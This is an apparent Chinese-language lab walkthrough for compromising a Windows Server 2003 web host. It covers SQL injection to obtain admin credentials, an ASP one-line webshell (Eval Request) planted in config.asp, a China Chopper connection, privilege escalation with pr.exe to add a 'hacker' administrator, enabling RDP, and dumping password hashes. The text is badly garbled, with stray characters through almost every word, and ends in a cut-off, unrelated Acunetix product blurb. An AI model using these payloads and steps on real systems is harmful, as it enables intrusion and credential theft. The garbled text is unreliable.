通過菜刀工具獲取目標(biāo)主機(jī)權(quán)限

獲取webshell后，上傳一句話木馬，通過中國菜刀連接啟動(dòng)3389服務(wù)，添加管理員賬戶，獲取目標(biāo)主機(jī)的權(quán)限獲取webshell插入一句話木馬的方法有很多，不一定是通過sql注入。從中國菜刀連接上靶機(jī)后，獲取服務(wù)器權(quán)限的步驟方式都一樣Setp0實(shí)驗(yàn)環(huán)境操作機(jī)：WindowsXP[]目標(biāo)機(jī)：Windowsserver2003[]實(shí)驗(yàn)工具：中國菜刀Pr御劍Pangolin3389本實(shí)驗(yàn)要求獲取test.ichunqiu網(wǎng)站的服務(wù)器權(quán)限。Step1目錄掃描工具：御劍

路徑：C:\Tools\目錄掃描\打開御劍，在域名中輸入://test.ichunqiu，開始掃描；在目錄列表中查找后臺(tái)，發(fā)現(xiàn)存在/admin雷雙擊打開后亦臺(tái)登錄頁面晃:呆//www殲.test陸.ichu確nqiu/客admin駝不過用戶名醉和密碼都不粥知道，沒關(guān)聞系，進(jìn)行下躺一步：獲取件用戶名和密夜碼。椒Step薦2魚工具：旁注筐WEB綜合尺檢測程序V灣er3.6趨修正版遙路徑：C:鉛\Tool出s\注入工難具\(yùn)Dom持ain3.尚6\Dom丸ain3.膠6.紗exe些打開工具，魚依次點(diǎn)擊蹤[SQL注催入]--車>[批量掃膝描注入點(diǎn)]話-->填[添加網(wǎng)址貪]-->挑[批量分艙析注入點(diǎn)]弓；嶺出現(xiàn)下面這憤個(gè)對話框說合明已經(jīng)檢測努完畢；樂點(diǎn)擊OK進(jìn)識(shí)行下一步；花注入點(diǎn)分析屑完畢后，會(huì)思在下方列表先中顯示可注個(gè)入的地址，嶄選擇其中一毀個(gè)地址，右哭鍵選擇[涂檢測注入]低；牙點(diǎn)擊[檢荷測注入]栽后，主界面券從[批量慈掃描注入點(diǎn)增]轉(zhuǎn)到肝[SQL逼注入猜解檢屠測鬼]，點(diǎn)擊價(jià)[開始檢測腥]；土檢測完畢后毛，顯示可以錄注入，并列包出了數(shù)據(jù)庫撞類型：Ac商cess數(shù)傍據(jù)庫；水下面開始逐泰步[餓猜解表標(biāo)名]--彩>[劃猜解列名旋]-->淡[侄猜解內(nèi)容蘇]；點(diǎn)擊貫[聚猜解表樸名]后，泛在數(shù)據(jù)庫列暴表中會(huì)顯示編4個(gè)表，分莫?jiǎng)e是adm尖in、us糠er、mo多vie和n磚ews；哥選擇adm乘in表，點(diǎn)滴擊[感猜解列名渡]，成功猜桿解出三個(gè)列彎名id、u臉serna箭me和pa漏sswor投d；弄勾選杰usern摩ame和p避asswo懲rd，點(diǎn)擊懶[焰猜解內(nèi)容嫌]，右側(cè)列顆表中成功顯習(xí)示用戶名a滔dmin，勾密碼469運(yùn)e80d3胃2c055圣9f8未當(dāng)然密碼是學(xué)MD5加密犬的，打開本更機(jī)瀏覽器，吳輸入htt熟顯ww硬d5.co閱m，輸入剛抖剛查詢到的慮密文，點(diǎn)擊葉[解密]判；周成功找到明爆文密碼：a踢dmin8育88；火注入的方法麻與工具很多腳，或者也可洗以這樣：在啄瀏覽器中打還開網(wǎng)站首頁掠:洲//www煎.test孕.ichu隙nqiu，忌在最新產(chǎn)品字中隨便選擇肅一個(gè)打開動(dòng)[注入點(diǎn)太倒多]；王掛復(fù)制URL桑[www汁.test圖.ichu雷nqiu/振Produ肢ctSho哄w.asp倉?ID=7析]，使用工哄具：穿山甲先工具：[穿敗山甲Pan劇golin敢]

五路徑：C比:\Too庫ls\注入褲工具\(yùn)pa誓ngoli粘n勸Pango尼lin餃?zhǔn)且豢顜椭虧B透測試人享員進(jìn)行婆Sql駁注入測試的志安全工具。刑所謂的SQ描L注入測試胳就是通過利繪用目標(biāo)網(wǎng)站圈的某個(gè)頁面沒缺少對用戶塘傳遞參數(shù)控喚制或者控制鄙的不夠好的牌情況下出現(xiàn)毅的漏洞，從獅而達(dá)到獲取剖、修改、刪遺除數(shù)據(jù)，甚摩至控制數(shù)據(jù)第庫服務(wù)器、谷Web服務(wù)禍器的目的的撐測試方驅(qū)法；籍打開穿山甲行，輸入U(xiǎn)R跪L，點(diǎn)擊綠飯色三角箭頭揭進(jìn)行注入操秒作；掃點(diǎn)擊[D緊ates]滾切換到D族ates選搖項(xiàng)卡，點(diǎn)擊羽[Tab靜les]鳴成功猜解出奸4張表；賺獲取內(nèi)容的悼原理同Do術(shù)main的奇使用方法一乒樣，[淚猜解表頃名]-->債[包猜解列名挨]-->[窩猜解內(nèi)容恒]；翻同樣能獲取送用戶名和密亦碼；鹽駁下一步：登品錄后臺(tái)，上腸傳木馬；呆Setp大3盼打開后臺(tái)登隆錄頁面，輸墓入用戶名a竹dmin，下密碼adm右in888誕，輸入驗(yàn)證偶碼，點(diǎn)擊躬[ENTE駝R]登錄波后臺(tái)；若久違的后臺(tái)挑終于進(jìn)去了硬….井點(diǎn)擊左側(cè)菜布單欄中的定[系統(tǒng)設(shè)置鏈管理]--鮮>[網(wǎng)站信租息配置]，叫用修改配置陵文件的方法舒獲取熱WebSh姜ell養(yǎng)；麻打開相應(yīng)頁奪面后，將齊[公司名稱緒]內(nèi)容修概改為一句話簡木馬

仰"%><%碼Eval當(dāng)Requ棗est(償Chr培(35))派%><%'烏寫一句話木劉馬的時(shí)候注閉意閉合；發(fā)錄點(diǎn)擊最下面暫的[保存模設(shè)置]按渴鈕；喝如果插馬成攤功毀，[公司名戰(zhàn)稱]內(nèi)容導(dǎo)為空；丑打開[中品國菜刀]擇連接一句話眾木馬；草工具：中國授菜刀

挺路徑：C軟:\Too石ls\we要bshel莖l\中國菜今刀飼打開菜刀，缺右鍵空白處脅，選擇[導(dǎo)添加]；錯(cuò)在地址欄中潔輸入htt仰淡ww.te紀(jì)st.ic陳hunqi山u/inc痕/conf波ig.as符p，為什么鞏是這個(gè)路徑??？因?yàn)槲覀兡縿偛判薷牡母炀W(wǎng)站信息配刻置頁面，就或是這個(gè)路徑迷，可以自己裂下載一個(gè)魅泰力企業(yè)網(wǎng)站銷管理系統(tǒng)源法碼看看，2渴007或2各009版的萍都行，里面燙的目錄結(jié)構(gòu)系一目了然；板連接密碼為咸#，密碼為夏什么是#？謙往上看一奪句話木馬，奉里面有個(gè)泰chr塞(35)，按#的疼ascii沒碼就是漆35，當(dāng)然辰這個(gè)密碼可介以隨便設(shè)置巧，只要保證領(lǐng)服務(wù)端一句蜻話木馬里的其密碼和添加繡SHELL更時(shí)輸入的密鎖碼一致即可愧，點(diǎn)擊[晶添加]；錦添加成功后種會(huì)新增一條換記錄；喉雙擊這個(gè)U斑RL，成功帳進(jìn)入！拐解釋一下一禾句話木馬遷/鞠inc壺/conf剃ig.as泉p的源碼是枝這樣的：<%互Const蕩攤SiteN駐ame誕="字魅力企業(yè)網(wǎng)翠站管理系統(tǒng)腔2007堡殲中英增繁沸商業(yè)正式版按"

雖

'伸網(wǎng)站名稱維Const渾掉EnSit驢eName羨="MSC震OM20部07"

爛墻

'本網(wǎng)站名稱性Const抵給SiteT夾itle反="既魅力軟件樸"

末

'濃網(wǎng)站標(biāo)題濕Const萄晝EnSit慣eTitl刊e宏="址Melyy柜Soft蛋"

腔

'婆網(wǎng)站標(biāo)題播Const怎頁SiteU狠rl南="www祥.mely欄ysoft點(diǎn)"錘撕

'茂網(wǎng)站地址進(jìn)Const懸括Miibe司ian勤="鳳湘滿ICP島備基05011多184沸號(hào)煩"

墻

'遇網(wǎng)站備案號(hào)….%>復(fù)制代碼哲構(gòu)造一句話驢木馬：組"%>匙<%臂Eval繩Requ舊est(遙Chr些(35))現(xiàn)%><%'復(fù)制代碼堆插入一句話迫木馬后，c代onfig悅.asp代問碼會(huì)變成這原樣：<%泉Const抗贈(zèng)SiteN離ame酒=""%>貴<%側(cè)Eval臺(tái)Requ帽est(探Chr隙(35))太%><%蛛'"

蜻宇'氏網(wǎng)站名稱鎖Const燈怖EnSit呆eName任="MSC邪OM20他07"

同伶

'壯網(wǎng)站名稱智Const乖音SiteT米itle匹="蹦魅力軟件儲(chǔ)"

折

'弄網(wǎng)站標(biāo)題司Const鴨將EnSit更eTitl貿(mào)e鼠="耍Melyy產(chǎn)Soft群"

親

'顆網(wǎng)站標(biāo)題騾Const傻冠SiteU灶rl翠="www廢.mely小ysoft仙"撫象

'叔網(wǎng)站地址糖Const靈后Miibe免ian再="窮湘奇ICP擴(kuò)備繳05011覽184離號(hào)抗"

筆

'脈網(wǎng)站備案號(hào)….%>復(fù)制代碼掩代碼再整理葉規(guī)范一點(diǎn)就腸是這樣：滅<%等Const夠穩(wěn)SiteN途ame紀(jì)=""%>醫(yī)<%盯Eval貍霜Reque象st(口Chr蟻(35))標(biāo)%>夕<%'"邀裳

'魯網(wǎng)站名稱歸Const凝雞EnSit肌eName尼="MSC煉OM20誠07"

猾鎮(zhèn)

'憂網(wǎng)站名稱箱Const歌旦SiteT傭itle攏="鹿魅力軟件永"

摧

'駱網(wǎng)站標(biāo)題痰Const勻鏟EnSit夾eTitl利e厚="價(jià)Melyy替Soft覺"

梯

'壩網(wǎng)站標(biāo)題怠Const筋犯SiteU廈rl搞="www寺.mely糖ysoft潮"拍園

'挖網(wǎng)站地址青Const繩墨Miibe障ian休="辯湘環(huán)ICP吩備傾05011用184榴號(hào)迫"

甩

'很網(wǎng)站備案號(hào)….%>復(fù)制代碼傻所以插入一脊句話木馬一乖定要保證整曠個(gè)代碼的語股法是正確的指，否則肯定許不成功；悟下一步，添同加賬戶--懲>開啟33宏89-->沫遠(yuǎn)程桌面連陣接-->獲禍取管理員賬此戶密碼；唇Step抹4貍進(jìn)入C:\另RECYC秀LER目錄柏，準(zhǔn)備上顛傳提權(quán)角工具；當(dāng)然霉可寫的目錄案不知這一個(gè)迅，還有其他慚的；

魯提權(quán)工具溫包括諷pr穩(wěn)，3389桿，涂cmd綁，路徑：C汪:\Too覺ls\盜提權(quán)工具術(shù)\wind凈ows待開始上傳工曬具，選中這漁三個(gè)文件，個(gè)用鼠標(biāo)直接吵拖到中國菜鳥刀中，即可裕完成上傳；貴上傳成功；停Pr.ex裁e自提權(quán)零Windo衣ws跟蹤注襖冊表項(xiàng)的A膽CL權(quán)限提儀升漏洞

沿KB952羅004

疏MS09-劈012糟Windo眨ws管理規(guī)匪范（WMI浴）提供程序害沒有正確地幻隔離升Netwo蛋rkSer守vice吵或揉Local刑Servi籮ce剃帳號(hào)南下運(yùn)行的進(jìn)顯程，同一榮帳號(hào)雹下運(yùn)行的兩竿個(gè)獨(dú)立進(jìn)程序可以飽完全訪問件對方的文件概句柄、注冊拳表項(xiàng)等資源競。WMI提春供程序主機(jī)熊進(jìn)程在某些綁情況下會(huì)持阻有SYST瓣EM令牌，查如果攻擊者壞可以以腸Netwo養(yǎng)rkSer鐘vice屯或屯Local儀Servi到ce州帳號(hào)辦訪問計(jì)算機(jī)央，攻擊者就衰可以執(zhí)行代格碼探索SY衫STEM令鋤牌的WMI阻提供程序主鞏機(jī)進(jìn)程。一頭旦找到了S稅YSTEM嘆令牌，就可礙以獲得SY逝STEM權(quán)母限的提升。重使用方法：瘋pr.ex神e"ne銷tuse遠(yuǎn)rhac毒ker1剛23/a監(jiān)dd&踏net挽local怠group脊admi雖nistr黃ators葡hack菌er/a星dd"復(fù)制代碼壯netu斥serh層acker五123稿/add弟添加一個(gè)用奸戶名為ha穩(wěn)cker、梢密碼為12例3的賬戶；瓦net數(shù)local勺group也admi次nistr例ators作hack撲er/a梨dd

首將賬戶ha士cker添暴加到管理員尺組；叔提權(quán)有碧很多種，如熟巴西烤肉C帖hurra咸sco.e厭xe等；經(jīng)下一步，居執(zhí)行提權(quán)操創(chuàng)作忽；舊右鍵cmd穗.exe，欺選擇[虛罩?jǐn)M終端]奔成功進(jìn)入，含將目錄切換陳到C:\R其ECYCL夢ER被用pr.e破xe執(zhí)行迎cmd習(xí)命令，添加怠賬戶；螞pr白"net掩user奏hack孫er12舉3/ad賊d"復(fù)制代碼燕第一次執(zhí)行致命令有可能盆不成功，怎何么辦？成沒關(guān)系，再復(fù)執(zhí)行一次就扔OK了；丈賬戶添加成占功，下一步低，將hac壽ker賬戶著添加到系統(tǒng)欠管理員組；任pr筋"net蔑踐local瀉group階admi勁nistr敬ators德hack勻er/a矮dd"復(fù)制代碼限添加成功，蘆下一步，開衫啟3389獸；促pr港3389復(fù)制代碼峰如果出現(xiàn)如孝上圖中的一行大堆命令，溫說明執(zhí)行成拿功了，不成約功就多執(zhí)行倆幾次命令，紫下一步，連塔接目標(biāo)機(jī)；嘩[開始]-訪->[運(yùn)行度]-->看mstsc撿如果找不見嬌目標(biāo)IP地椅址，請點(diǎn)擊索右上角[收場景拓?fù)鋱D彈]進(jìn)行查肯看：役輸入目標(biāo)I煙P地址：1嚴(yán)72.16奏.12.2萄，開始連接礦，繼續(xù)輸入域用戶名ha捷cker和咳密碼123朽，進(jìn)入系統(tǒng)誠；嶺3389連堵接成功！下?lián)p一步，獲取皆系統(tǒng)管理員體密碼，準(zhǔn)確糾的說是獲取聞系統(tǒng)管理員矮密碼的ha淹sh，上笛傳密碼獲取堅(jiān)工具，還折是使用菜刀嶄上傳；鑒工具一大堆擠，隨便用，道這里我們使語用炕Quark砍sPwDu縱m蓮，開始上傳助；亡上傳成功，漿進(jìn)入目標(biāo)機(jī)敗，運(yùn)行虧Quark藥sPwDu撈mp籃鏡注勸：打開包c(diǎn)md刷，用命令行蛛啟動(dòng)狡Quark少sPwDu岸mp叮，不要直接私雙擊；袖運(yùn)行后，會(huì)末出現(xiàn)如下界玩面：訓(xùn)繼續(xù)輸入命訴令：芬Quark切sPwDu立mp封--du動(dòng)mp-ha按sh-lo謝cal復(fù)制代碼掀執(zhí)行后的結(jié)屯果如下：軌成功獲取到顛admin棗istra蜜tor的h陸ash：6這2C470紀(jì)0EBB0片5958F筆3832C情92FC6伍14B7D究1:4D4匹78675睡34454兔1AACC戚F6CF3右3E1DD蔽9D85蔽暫時(shí)切換出辰實(shí)驗(yàn)環(huán)境，嗎在你的電腦都上打開瀏覽朝器輸入ht塔tp://蘇o兔bject羨if-se趣curit挨e.ch/硬en/op噴hcrac匙k.php慮，在頁面的泄相應(yīng)位置輸伍入hash營，然后GO得；使ps唱：如果打不旺開就翻墻，伐或者用其他稻類似功能的割網(wǎng)站也可以街，這樣的站儲(chǔ)點(diǎn)很多；朵最終結(jié)果輸蒸出：顏繼_____棟_____潤_____柄_____第_____管_____對_____朽_____志_____掠_____蜂_____嶄_____抓_____劇_____沾_____獻(xiàn)_____亡_____殖_____火_____哥_____溫_____成_____偉_____房_____招_____哨_____晶_____父____意WVS嗎WVS家[Web燙Vuln湯erabi慈lity江Scann雜er]是偽一個(gè)自動(dòng)化鹽的Web應(yīng)隱用程序安全軋測試工具。疫官網(wǎng)：ht仰tps:/品/灶acune角tix.c腐om/詞1、WVS怕可以通過檢意查SQL注桌入攻擊漏洞黃、滋跨站腳本善攻擊漏洞等氏來審核We樓b應(yīng)用程序酬。脂2、它可以奧掃描任何可太通過Web昨?yàn)g覽器訪問工的和遵循H席TTP/H宋TTPS規(guī)晨則的Web慰站點(diǎn)和We剛b應(yīng)用程序羞。餅3、除了自另動(dòng)化地掃描張可以利用的柱漏洞，WV常S還提供了航分析現(xiàn)有通鍵用產(chǎn)品和客準(zhǔn)戶定制產(chǎn)品票（包括那些才依賴于Ja棚vaScr麗ipt的程具序即AJA帥X應(yīng)用程序踐）的一個(gè)強(qiáng)掩健的解決方污案。摸4、登錄保膠護(hù)頁面的自銳動(dòng)掃描。港一個(gè)網(wǎng)站最澤有可能被攻猶擊和容易受冒到攻擊的區(qū)射域往往是那島些需要用戶念登錄的區(qū)域蝴。

因此偉對的蒙Acune咳tix古最新版本現(xiàn)脈在可以自動(dòng)溝地和輕松瀏佩覽復(fù)雜的驗(yàn)擾證區(qū)域，不熱再需要經(jīng)常椒需要手動(dòng)干穿預(yù)。

這鴉包括可以掃癥描使用單點(diǎn)錫登錄（SS系O）和基于死OAuth汁認(rèn)證的We趙b應(yīng)用程序改。蓄5、檢測W黎P核心和W輝P插件的漏則洞?？梢詼珯z測超過1仁200個(gè)W家ordPr膏ess核腥心和插件的君漏洞，目前嗓全球市場上時(shí)沒有其他掃噸描器可以檢瓜測這么多的疤Wo